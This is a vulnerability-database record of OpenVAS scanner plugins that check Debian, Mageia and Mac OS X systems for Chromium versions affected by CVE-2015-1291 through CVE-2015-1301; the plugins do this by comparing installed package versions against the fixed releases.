ID OPENVAS:1361412562310703351 Type openvas Reporter Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net Modified 2019-03-18T00:00:00
Description
Several vulnerabilities have been discovered in the chromium web browser.
CVE-2015-1291
A cross-origin bypass issue was discovered in DOM.
CVE-2015-1292
Mariusz Mlynski discovered a cross-origin bypass issue in ServiceWorker.
CVE-2015-1293
Mariusz Mlynski discovered a cross-origin bypass issue in DOM.
CVE-2015-1294
cloudfuzzer discovered a use-after-free issue in the Skia graphics
library.
CVE-2015-1295
A use-after-free issue was discovered in the printing component.
CVE-2015-1296
zcorpan discovered a character spoofing issue.
CVE-2015-1297
Alexander Kashev discovered a permission scoping error.
CVE-2015-1298
Rob Wu discovered an error validating the URL of extensions.
CVE-2015-1299
taro.suzuki.dev discovered a use-after-free issue in the Blink/WebKit
library.
CVE-2015-1300
cgvwzq discovered an information disclosure issue in the Blink/WebKit
library.
CVE-2015-1301
The chrome 45 development team found and fixed various issues
during internal auditing. Also multiple issues were fixed in
the libv8 library, version 4.5.103.29.
# OpenVAS Vulnerability Test
# $Id: deb_3351.nasl 14275 2019-03-18 14:39:45Z cfischer $
# Auto-generated from advisory DSA 3351-1 using nvtgen 1.0
# Script version: 1.0
#
# Author:
# Greenbone Networks
#
# Copyright:
# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net
# Text descriptions are largely excerpted from the referenced
# advisory, and are Copyright (c) the respective author(s)
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.703351");
script_version("$Revision: 14275 $");
script_cve_id("CVE-2015-1291", "CVE-2015-1292", "CVE-2015-1293", "CVE-2015-1294",
"CVE-2015-1295", "CVE-2015-1296", "CVE-2015-1297", "CVE-2015-1298",
"CVE-2015-1299", "CVE-2015-1300", "CVE-2015-1301");
script_name("Debian Security Advisory DSA 3351-1 (chromium-browser - security update)");
script_tag(name:"last_modification", value:"$Date: 2019-03-18 15:39:45 +0100 (Mon, 18 Mar 2019) $");
script_tag(name:"creation_date", value:"2015-09-03 00:00:00 +0200 (Thu, 03 Sep 2015)");
script_tag(name:"cvss_base", value:"7.5");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_tag(name:"solution_type", value:"VendorFix");
script_tag(name:"qod_type", value:"package");
script_xref(name:"URL", value:"http://www.debian.org/security/2015/dsa-3351.html");
script_category(ACT_GATHER_INFO);
script_copyright("Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net");
script_family("Debian Local Security Checks");
script_dependencies("gather-package-list.nasl");
script_mandatory_keys("ssh/login/debian_linux", "ssh/login/packages", re:"ssh/login/release=DEB8");
script_tag(name:"affected", value:"chromium-browser on Debian Linux");
script_tag(name:"solution", value:"For the stable distribution (jessie), these problems have been fixed in
version 45.0.2454.85-1~deb8u1.
For the testing distribution (stretch), these problems will be fixed
once the gcc-5 transition completes.
For the unstable distribution (sid), these problems have been fixed in
version 45.0.2454.85-1.
We recommend that you upgrade your chromium-browser packages.");
script_tag(name:"summary", value:"Several vulnerabilities have been discovered in the chromium web browser.
CVE-2015-1291
A cross-origin bypass issue was discovered in DOM.
CVE-2015-1292
Mariusz Mlynski discovered a cross-origin bypass issue in ServiceWorker.
CVE-2015-1293
Mariusz Mlynski discovered a cross-origin bypass issue in DOM.
CVE-2015-1294
cloudfuzzer discovered a use-after-free issue in the Skia graphics
library.
CVE-2015-1295
A use-after-free issue was discovered in the printing component.
CVE-2015-1296
zcorpan discovered a character spoofing issue.
CVE-2015-1297
Alexander Kashev discovered a permission scoping error.
CVE-2015-1298
Rob Wu discovered an error validating the URL of extensions.
CVE-2015-1299
taro.suzuki.dev discovered a use-after-free issue in the Blink/WebKit
library.
CVE-2015-1300
cgvwzq discovered an information disclosure issue in the Blink/WebKit
library.
CVE-2015-1301
The chrome 45 development team found and fixed various issues
during internal auditing. Also multiple issues were fixed in
the libv8 library, version 4.5.103.29.");
script_tag(name:"vuldetect", value:"This check tests the installed software version using the apt package manager.");
exit(0);
}
include("revisions-lib.inc");
include("pkg-lib-deb.inc");
res = "";
report = "";
if((res = isdpkgvuln(pkg:"chromedriver", ver:"45.0.2454.85-1~deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"chromium", ver:"45.0.2454.85-1~deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"chromium-dbg", ver:"45.0.2454.85-1~deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"chromium-inspector", ver:"45.0.2454.85-1~deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"chromium-l10n", ver:"45.0.2454.85-1~deb8u1", rls:"DEB8")) != NULL) {
report += res;
}
if(report != "") {
security_message(data:report);
} else if (__pkg_match) {
exit(99);
}
{"id": "OPENVAS:1361412562310703351", "type": "openvas", "bulletinFamily": "scanner", "title": "Debian Security Advisory DSA 3351-1 (chromium-browser - security update)", "description": "Several vulnerabilities have been discovered in the chromium web browser.\n\nCVE-2015-1291\nA cross-origin bypass issue was discovered in DOM.\n\nCVE-2015-1292\nMariusz Mlynski discovered a cross-origin bypass issue in ServiceWorker.\n\nCVE-2015-1293\nMariusz Mlynski discovered a cross-origin bypass issue in DOM.\n\nCVE-2015-1294\ncloudfuzzer discovered a use-after-free issue in the Skia graphics\nlibrary.\n\nCVE-2015-1295\nA use-after-free issue was discovered in the printing component.\n\nCVE-2015-1296\nzcorpan discovered a character spoofing issue.\n\nCVE-2015-1297\nAlexander Kashev discovered a permission scoping error.\n\nCVE-2015-1298\nRob Wu discovered an error validating the URL of extensions.\n\nCVE-2015-1299\ntaro.suzuki.dev discovered a use-after-free issue in the Blink/WebKit\nlibrary.\n\nCVE-2015-1300\ncgvwzq discovered an information disclosure issue in the Blink/WebKit\nlibrary.\n\nCVE-2015-1301\nThe chrome 45 development team found and fixed various issues\nduring internal auditing. Also multiple issues were fixed in\nthe libv8 library, version 4.5.103.29.", "published": "2015-09-03T00:00:00", "modified": "2019-03-18T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703351", "reporter": "Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net", "references": ["http://www.debian.org/security/2015/dsa-3351.html"], "cvelist": ["CVE-2015-1301", "CVE-2015-1291", "CVE-2015-1297", "CVE-2015-1298", "CVE-2015-1295", "CVE-2015-1296", "CVE-2015-1300", "CVE-2015-1293", "CVE-2015-1294", "CVE-2015-1292", "CVE-2015-1299"], "lastseen": "2019-05-29T18:36:45", "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "redhat", "idList": ["RHSA-2015:1712"]}, {"type": "nessus", "idList": ["OPENSUSE-2015-953.NASL", "GENTOO_GLSA-201603-09.NASL", "FREEBSD_PKG_A9350DF8515711E5B5C1E8E0B747A45A.NASL", "DEBIAN_DSA-3351.NASL", "REDHAT-RHSA-2015-1712.NASL", "GOOGLE_CHROME_45_0_2454_85.NASL", "OPENSUSE-2015-595.NASL", "MACOSX_GOOGLE_CHROME_45_0_2454_85.NASL", "UBUNTU_USN-2735-1.NASL"]}, {"type": "threatpost", "idList": ["THREATPOST:11A1C9F40976B75AB3CA7BBF0CEC88B3"]}, {"type": "openvas", "idList": ["OPENVAS:703351", "OPENVAS:1361412562310806040", "OPENVAS:1361412562310806039", "OPENVAS:1361412562310130032", "OPENVAS:1361412562310842433", "OPENVAS:1361412562310121451", "OPENVAS:1361412562310806041"]}, {"type": "debian", "idList": ["DEBIAN:DSA-3351-1:F2373"]}, {"type": "archlinux", "idList": ["ASA-201509-1"]}, {"type": "freebsd", "idList": ["A9350DF8-5157-11E5-B5C1-E8E0B747A45A"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:14682", "SECURITYVULNS:DOC:32500"]}, {"type": "ubuntu", "idList": ["USN-2735-1"]}, {"type": "cve", "idList": ["CVE-2015-1299", "CVE-2015-1294", "CVE-2015-1300", "CVE-2015-1297", "CVE-2015-1291", "CVE-2015-1292", "CVE-2015-1293", "CVE-2015-1296", "CVE-2015-1298", "CVE-2015-1295"]}, {"type": "kaspersky", "idList": ["KLA10655"]}, {"type": "seebug", "idList": ["SSV:93033", "SSV:93034"]}, {"type": "gentoo", "idList": ["GLSA-201603-09"]}], "modified": "2019-05-29T18:36:45", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2019-05-29T18:36:45", "rev": 2}, "vulnersScore": 7.2}, "pluginID": "1361412562310703351", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3351.nasl 14275 2019-03-18 14:39:45Z cfischer $\n# Auto-generated from advisory DSA 3351-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703351\");\n script_version(\"$Revision: 14275 $\");\n script_cve_id(\"CVE-2015-1291\", \"CVE-2015-1292\", \"CVE-2015-1293\", \"CVE-2015-1294\",\n \"CVE-2015-1295\", \"CVE-2015-1296\", \"CVE-2015-1297\", \"CVE-2015-1298\",\n \"CVE-2015-1299\", \"CVE-2015-1300\", \"CVE-2015-1301\");\n script_name(\"Debian Security Advisory DSA 3351-1 (chromium-browser - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:39:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-09-03 00:00:00 +0200 (Thu, 03 Sep 2015)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2015/dsa-3351.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n script_tag(name:\"affected\", value:\"chromium-browser on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (jessie), these problems have been fixed in\nversion 45.0.2454.85-1~deb8u1.\n\nFor the testing distribution (stretch), these problems will be fixed\nonce the gcc-5 transition completes.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 45.0.2454.85-1.\n\nWe recommend that you upgrade your chromium-browser packages.\");\n script_tag(name:\"summary\", value:\"Several vulnerabilities have been discovered in the chromium web browser.\n\nCVE-2015-1291\nA cross-origin bypass issue was discovered in DOM.\n\nCVE-2015-1292\nMariusz Mlynski discovered a cross-origin bypass issue in ServiceWorker.\n\nCVE-2015-1293\nMariusz Mlynski discovered a cross-origin bypass issue in DOM.\n\nCVE-2015-1294\ncloudfuzzer discovered a use-after-free issue in the Skia graphics\nlibrary.\n\nCVE-2015-1295\nA use-after-free issue was discovered in the printing component.\n\nCVE-2015-1296\nzcorpan discovered a character spoofing issue.\n\nCVE-2015-1297\nAlexander Kashev discovered a permission scoping error.\n\nCVE-2015-1298\nRob Wu discovered an error validating the URL of extensions.\n\nCVE-2015-1299\ntaro.suzuki.dev discovered a use-after-free issue in the Blink/WebKit\nlibrary.\n\nCVE-2015-1300\ncgvwzq discovered an information disclosure issue in the Blink/WebKit\nlibrary.\n\nCVE-2015-1301\nThe chrome 45 development team found and fixed various issues\nduring internal auditing. Also multiple issues were fixed in\nthe libv8 library, version 4.5.103.29.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"chromedriver\", ver:\"45.0.2454.85-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"chromium\", ver:\"45.0.2454.85-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"chromium-dbg\", ver:\"45.0.2454.85-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"chromium-inspector\", ver:\"45.0.2454.85-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"chromium-l10n\", ver:\"45.0.2454.85-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "naslFamily": "Debian Local Security Checks"}
{"openvas": [{"lastseen": "2017-07-24T12:52:22", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-1301", "CVE-2015-1291", "CVE-2015-1297", "CVE-2015-1298", "CVE-2015-1295", "CVE-2015-1296", "CVE-2015-1300", "CVE-2015-1293", "CVE-2015-1294", "CVE-2015-1292", "CVE-2015-1299"], "description": "Several vulnerabilities have been discovered in the chromium web browser.\n\nCVE-2015-1291 \nA cross-origin bypass issue was discovered in DOM.\n\nCVE-2015-1292 \nMariusz Mlynski discovered a cross-origin bypass issue in ServiceWorker.\n\nCVE-2015-1293 \nMariusz Mlynski discovered a cross-origin bypass issue in DOM.\n\nCVE-2015-1294 \ncloudfuzzer discovered a use-after-free issue in the Skia graphics\nlibrary.\n\nCVE-2015-1295 \nA use-after-free issue was discovered in the printing component.\n\nCVE-2015-1296 \nzcorpan discovered a character spoofing issue.\n\nCVE-2015-1297 \nAlexander Kashev discovered a permission scoping error.\n\nCVE-2015-1298 \nRob Wu discovered an error validating the URL of extensions.\n\nCVE-2015-1299 \ntaro.suzuki.dev discovered a use-after-free issue in the Blink/WebKit\nlibrary.\n\nCVE-2015-1300 \ncgvwzq discovered an information disclosure issue in the Blink/WebKit\nlibrary.\n\nCVE-2015-1301 \nThe chrome 45 development team found and fixed various issues\nduring internal auditing. Also multiple issues were fixed in\nthe libv8 library, version 4.5.103.29.", "modified": "2017-07-07T00:00:00", "published": "2015-09-03T00:00:00", "id": "OPENVAS:703351", "href": "http://plugins.openvas.org/nasl.php?oid=703351", "type": "openvas", "title": "Debian Security Advisory DSA 3351-1 (chromium-browser - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3351.nasl 6609 2017-07-07 12:05:59Z cfischer $\n# Auto-generated from advisory DSA 3351-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703351);\n script_version(\"$Revision: 6609 $\");\n script_cve_id(\"CVE-2015-1291\", \"CVE-2015-1292\", \"CVE-2015-1293\", \"CVE-2015-1294\",\n \"CVE-2015-1295\", \"CVE-2015-1296\", \"CVE-2015-1297\", \"CVE-2015-1298\",\n \"CVE-2015-1299\", \"CVE-2015-1300\", \"CVE-2015-1301\");\n script_name(\"Debian Security Advisory DSA 3351-1 (chromium-browser - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:59 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2015-09-03 00:00:00 +0200 (Thu, 03 Sep 2015)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2015/dsa-3351.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"chromium-browser on Debian Linux\");\n script_tag(name: \"solution\", value: \"For the stable distribution (jessie), these problems have been fixed in\nversion 45.0.2454.85-1~deb8u1.\n\nFor the testing distribution (stretch), these problems will be fixed\nonce the gcc-5 transition completes.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 45.0.2454.85-1.\n\nWe recommend that you upgrade your chromium-browser packages.\");\n script_tag(name: \"summary\", value: \"Several vulnerabilities have been discovered in the chromium web browser.\n\nCVE-2015-1291 \nA cross-origin bypass issue was discovered in DOM.\n\nCVE-2015-1292 \nMariusz Mlynski discovered a cross-origin bypass issue in ServiceWorker.\n\nCVE-2015-1293 \nMariusz Mlynski discovered a cross-origin bypass issue in DOM.\n\nCVE-2015-1294 \ncloudfuzzer discovered a use-after-free issue in the Skia graphics\nlibrary.\n\nCVE-2015-1295 \nA use-after-free issue was discovered in the printing component.\n\nCVE-2015-1296 \nzcorpan discovered a character spoofing issue.\n\nCVE-2015-1297 \nAlexander Kashev discovered a permission scoping error.\n\nCVE-2015-1298 \nRob Wu discovered an error validating the URL of extensions.\n\nCVE-2015-1299 \ntaro.suzuki.dev discovered a use-after-free issue in the Blink/WebKit\nlibrary.\n\nCVE-2015-1300 \ncgvwzq discovered an information disclosure issue in the Blink/WebKit\nlibrary.\n\nCVE-2015-1301 \nThe chrome 45 development team found and fixed various issues\nduring internal auditing. Also multiple issues were fixed in\nthe libv8 library, version 4.5.103.29.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software version using the apt package manager.\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"chromedriver\", ver:\"45.0.2454.85-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"chromium\", ver:\"45.0.2454.85-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"chromium-dbg\", ver:\"45.0.2454.85-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"chromium-inspector\", ver:\"45.0.2454.85-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"chromium-l10n\", ver:\"45.0.2454.85-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:36:04", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-1301", "CVE-2015-1291", "CVE-2015-1297", "CVE-2015-1298", "CVE-2015-1295", "CVE-2015-1296", "CVE-2015-1300", "CVE-2015-1293", "CVE-2015-1294", "CVE-2015-1292", "CVE-2015-1299"], "description": "Mageia Linux Local Security Checks mgasa-2015-0356", "modified": "2018-09-28T00:00:00", "published": "2015-10-15T00:00:00", "id": "OPENVAS:1361412562310130032", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310130032", "type": "openvas", "title": "Mageia Linux Local Check: mgasa-2015-0356", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: mgasa-2015-0356.nasl 11692 2018-09-28 16:55:19Z cfischer $\n#\n# Mageia Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://www.solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.130032\");\n script_version(\"$Revision: 11692 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-15 10:41:47 +0300 (Thu, 15 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 18:55:19 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Mageia Linux Local Check: mgasa-2015-0356\");\n script_tag(name:\"insight\", value:\"Updated chromium-browser-stable packages fix security vulnerabilities: Several flaws were found in the processing of malformed web content. A web page containing malicious content could cause Chromium to crash or, potentially, execute arbitrary code with the privileges of the user running Chromium (CVE-2015-1291, CVE-2015-1292, CVE-2015-1293, CVE-2015-1294, CVE-2015-1295, CVE-2015-1296, CVE-2015-1297, CVE-2015-1298, CVE-2015-1299, CVE-2015-1300, CVE-2015-1301).\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://advisories.mageia.org/MGASA-2015-0356.html\");\n script_cve_id(\"CVE-2015-1291\", \"CVE-2015-1292\", \"CVE-2015-1293\", \"CVE-2015-1294\", \"CVE-2015-1295\", \"CVE-2015-1296\", \"CVE-2015-1297\", \"CVE-2015-1298\", \"CVE-2015-1299\", \"CVE-2015-1300\", \"CVE-2015-1301\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mageia_linux\", \"ssh/login/release\", re:\"ssh/login/release=MAGEIA5\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Mageia Linux Local Security Checks mgasa-2015-0356\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Mageia Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MAGEIA5\")\n{\nif ((res = isrpmvuln(pkg:\"chromium-browser-stable\", rpm:\"chromium-browser-stable~45.0.2454.85~1.mga5\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-19T22:12:46", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-1301", "CVE-2015-1291", "CVE-2015-6583", "CVE-2015-1297", "CVE-2015-6580", "CVE-2015-1298", "CVE-2015-1295", "CVE-2015-1296", "CVE-2015-1300", "CVE-2015-6582", "CVE-2015-1293", "CVE-2015-1294", "CVE-2015-6581", "CVE-2015-1292", "CVE-2015-1299"], "description": "The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.", "modified": "2019-07-17T00:00:00", "published": "2015-09-07T00:00:00", "id": "OPENVAS:1361412562310806040", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310806040", "type": "openvas", "title": "Google Chrome Multiple Vulnerabilities-01 September15 (Mac OS X)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Google Chrome Multiple Vulnerabilities-01 September15 (Mac OS X)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.806040\");\n script_version(\"2019-07-17T08:15:16+0000\");\n script_cve_id(\"CVE-2015-6583\", \"CVE-2015-6582\", \"CVE-2015-6581\", \"CVE-2015-6580\",\n \"CVE-2015-1301\", \"CVE-2015-1300\", \"CVE-2015-1299\", \"CVE-2015-1298\",\n \"CVE-2015-1297\", \"CVE-2015-1296\", \"CVE-2015-1295\", \"CVE-2015-1294\",\n \"CVE-2015-1293\", \"CVE-2015-1292\", \"CVE-2015-1291\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 08:15:16 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2015-09-07 12:58:33 +0530 (Mon, 07 Sep 2015)\");\n script_name(\"Google Chrome Multiple Vulnerabilities-01 September15 (Mac OS X)\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to:\n\n - Use-after-free vulnerability in the shared-timer implementation in Blink.\n\n - Double free vulnerability in OpenJPEG before r3002, as used in PDFium.\n\n - Multiple vulnerabilities in Blink.\n\n - Improper validation of user supplied input for setUninstallURL preference.\n\n - Improper handling of requests by WebRequest API implementation.\n\n - Error in UnescapeURLWithAdjustmentsImpl implementation.\n\n - Multiple use-after-free vulnerabilities in the PrintWebViewHelper class.\n\n - Use-after-free vulnerability in the 'SkMatrix::invertNonIdentity' function\n in core/SkMatrix.cpp script in Skia.\n\n - Multiple unspecified vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to bypass security restrictions, cause a denial of service condition\n or potentially execute arbitrary code, conduct spoofing attack, gain sensitive\n information, trigger specific actions and other unspecified impacts.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version prior to\n 45.0.2454.85 on Mac OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version\n 45.0.2454.85 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"http://googlechromereleases.blogspot.in/2015/09/stable-channel-update.html\");\n\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_macosx.nasl\");\n script_mandatory_keys(\"GoogleChrome/MacOSX/Version\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!chromeVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:chromeVer, test_version:\"45.0.2454.85\"))\n{\n report = 'Installed version: ' + chromeVer + '\\n' +\n 'Fixed version: 45.0.2454.85' + '\\n';\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": 